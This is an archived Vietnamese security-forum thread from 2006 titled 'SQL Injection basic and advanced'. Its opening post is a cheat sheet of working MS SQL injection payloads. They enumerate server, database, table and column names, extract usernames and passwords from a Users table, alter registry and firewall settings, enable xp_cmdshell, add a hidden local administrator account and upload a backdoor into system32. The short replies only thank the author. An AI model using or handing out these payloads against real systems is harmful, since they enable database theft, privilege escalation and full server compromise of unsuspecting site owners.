SQL - Injection cơ bản và nâng cao

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

SQL - Injection cơ bản và nâng cao

[Article] SQL - Injection cơ bản và nâng cao	27/06/2006 09:05:52 (+0700) \| #1 \| 1260

darthtuan
HVA Friend

Joined: 10/08/2003 11:57:02
Messages: 312
Location: Trại cai nghiện
Offline

A. Khai thac thong tin ve SQL server

1. Khai thac thong tin ve MS SQL server
' Thông tin về version của MS SQL
and 1=@@version--sp_password
'Thông tin về servername
and 1=@@servername--sp_password
'Thông tin về SERVICENAME
and 1=@@SERVICENAME--sp_password
'Thông tin về UID
and 1=system_user--sp_password
'Thông tin về PWD
?

2. Khai thac thong tin ve Database
'Thông tin về tên database
and 1=db_name()--sp_password

3. Khai thac thong tin ve Table
'Khai thác thông tin về Table
having 1=1--sp_password
'Khai thác thông tin về các Table
group by QUESTIONS.QUEST_ID having 1=1--sp_password

'Khai thác thông tin về Table
UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES--sp_password
'Khai thác thông tin về các Table
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE
TABLE_NAME NOT IN ('PRODUCTS')--sp_password

'Khai thác thông tin về Table
and 38=convert(int,(select top 1 table_name from
information_schema.tables))--sp_password
'Khai thác thông tin về các Table
and 38=convert(int,(select top 1 table_name from
information_schema.tables
where table_name not in ('PRODUCTS')))--sp_password

4. Khai thac thong tin ve Column
'Khai thác thông tin về Column
and 38=convert(int,(select top 1 column_name from
information_schema.columns where
table_name=('QUESTIONS')))--sp_password
'Khai thác thông tin về các Column
and 38=convert(int,(select top 1 column_name from
information_schema.columns where table_name=('QUESTIONS') and
column_name
not in ('QUEST_ID')))--sp_password

5. Khai thac thong tin ve Content
'Khai thác thông tin với kiểu ngày giờ
and 1=convert(char(20),(select top 1 NgayXuat from
PhieuXuat))--sp_password
'Khai thác thông tin dòng tiếp theo với kiểu ngày giờ
and 1=convert(char(20),(select top 1 NgayXuat from PhieuXuat where
NgayXuat<>'Mar 12 2003 12:00AM '))--sp_password
'Khai thác thông tin về dòng đầu tiên
and 1=convert(int,(select top 1 userName+'/'+userPass from
Users))--sp_password
'Khai thác thông tin dòng tiếp theo
and 1=convert(int,(select top 1 userName+'/'+userPass from Users where
userName not in('admin')))--sp_password

6. Khai thac thong tin ve Table, Column, Content cua cac database tiep

Chú ý:
để nhận biết kiểu của cột
dữ liệu ta dùng "image" để kiểm tra:
-Nếu là trường kiểu ngày/giờ
Dùng: char,nchar,nvarchar,varchar

B. Upload backdoor lên host
1. Xác định mức quyền và cho phép thực thilệnh của MS SQL server
'Xác định mức quyền
;select * from openrowset('sqloledb','';;,'')--
'Thay đổi mức quyền
;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1--
;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0--
'Xoá bỏ và khôi phục Log và firewall trong MS SQL
;exec master..xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'--
;exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters',REG_DWORD,0--
'Cho phép sử dụng MASTER..XP_CMDSHELL & ALLOW UPDATES
;select * from openrowset('sqloledb',
'server=Digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec
sp_configure
''allow updates'', ''1'' reconfigure with override')--

2. Do thám đưa thêm các thông tin
'Do tham IP của server và đưa vào bảng testip
;drop table testip create table testip(stt int identity,dcip
varchar(1000)) insert into testip exec master..xp_cmdshell 'ipconfig'--
'Cộng thêm một quyền quản trị mới
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a
/add"')-- (%26 == "&")

3. Đưa backdoor lên server'Upload backdoor lên server vào thư mục C:\WINDOWS\system32
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..xp_cmdshell "chube >>runfile.txt"')--
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..xp_cmdshell "chube >>runfile.txt & hamhoc
>>runfile.txt"')--
'Kiểm tra xem backdoor đã upload thành công chưa
;drop table testip create table testip(stt int identity,dcip
varchar(1000)) insert into testip exec master..xp_cmdshell 'dir
runfile.txt'--

C. Chạy backdoor trên server
1. Xác nhận backdoor đã được kích hoạt

2. Chiếm toàn bộ quyền điều khiển server

[Question] SQL - Injection cơ bản và nâng cao	11/12/2006 07:04:47 (+0700) \| #2 \| 29718

longbon
Member

Joined: 10/07/2006 22:44:08
Messages: 4
Offline

là sao ? anh có thể nói rõ hơn đc ko ? em cám ơn !

[Question] SQL - Injection cơ bản và nâng cao	12/12/2006 22:50:48 (+0700) \| #3 \| 30061

FaL
Moderator

Joined: 14/04/2006 09:31:18
Messages: 1232
Offline

Bài này hay quá!
Thanks bác darthtuan nhiều!

Hãy giữ một trái tim nóng và một cái đầu lạnh

[Question] Re: SQL - Injection cơ bản và nâng cao	23/12/2006 06:35:13 (+0700) \| #4 \| 32251

zicusa
Member

Joined: 09/09/2004 16:56:11
Messages: 9
Offline

) Ui lâu nay em làm web có liên quan đến SQL, đi tìm mấy cái này mãi mà không thấy. Bây giờ đã gặp được roài. Em xin chan thành cảm ơn.

Go to:

Users currently in here
1 Anonymous